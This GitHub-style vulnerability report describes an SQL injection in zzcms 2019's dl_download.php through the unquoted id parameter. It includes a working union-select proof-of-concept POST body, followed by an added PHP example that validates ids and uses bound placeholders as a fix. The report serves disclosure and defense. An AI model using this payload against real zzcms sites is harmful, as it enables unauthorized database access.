zzcms 2019 dl/dl_download.php SQL injection #4

Open
cby234 opened this issue May 22, 2019 · 0 comments

cby234 commented May 22, 2019

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)

image

If the index of the ',' value in the id parameter is bigger than 0, the SQL will be

image

When we check the query, there is no single quote around the id parameter, so we can inject
any query with the id parameter.

image

We can find there is no security filter for the id parameter, which means we can inject an SQL query via
the id parameter if we concat a ',' value at the end of the id parameter.

0x02 payload

Give the "POC" value below as the post data for "/dl/dl_download.php".

POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,

image

image

@cby234 cby234 closed this as completed May 22, 2019
@cby234 cby234 changed the title zzcms_2019_SQL_INJECTION(dl/dl_download.php) zzcms 2019 dl/dl_download.php SQL_INJECTION May 22, 2019
@cby234 cby234 changed the title zzcms 2019 dl/dl_download.php SQL_INJECTION zzcms 2019 dl/dl_download.php SQL injection May 22, 2019
@cby234 cby234 reopened this Jun 1, 2022
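
A hardened form of the lookup the report describes, as an added example that is not part of the original issue and is not zzcms code: the id list is validated as decimal integers and bound through placeholders, so its values never become part of the SQL text. The table name `zzcms_dl` comes from the issue; the function names, the `title` column, the `id IN (...)` query shape and the sample rows are assumptions.

```php
<?php
// Added example, not zzcms code. Function names, the title column and the
// sample rows are assumptions made for illustration.

/** Accept only decimal integer ids; anything else is rejected outright. */
function parse_id_list($raw): array
{
    // id may arrive as id[]=1&id[]=2 (array) or as "1,2" (string)
    $parts = is_array($raw) ? $raw : explode(',', (string)$raw);
    $ids = [];
    foreach ($parts as $p) {
        $p = trim((string)$p);
        if ($p === '') {
            continue; // tolerate a trailing comma
        }
        if (!ctype_digit($p)) {
            throw new InvalidArgumentException('non-numeric id rejected');
        }
        $ids[] = (int)$p;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no ids supplied');
    }
    return $ids;
}

/** One bound placeholder per id; the values are sent separately from the SQL. */
function fetch_by_ids(PDO $db, array $ids): array
{
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id, title FROM zzcms_dl WHERE id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE zzcms_dl (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO zzcms_dl VALUES (1,'a'),(2,'b'),(3,'c')");

print_r(fetch_by_ids($db, parse_id_list(['1', '3'])));

try {
    // Constructed input shaped like the report: SQL text after the number
    parse_id_list(['1) union select 1-- a,']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```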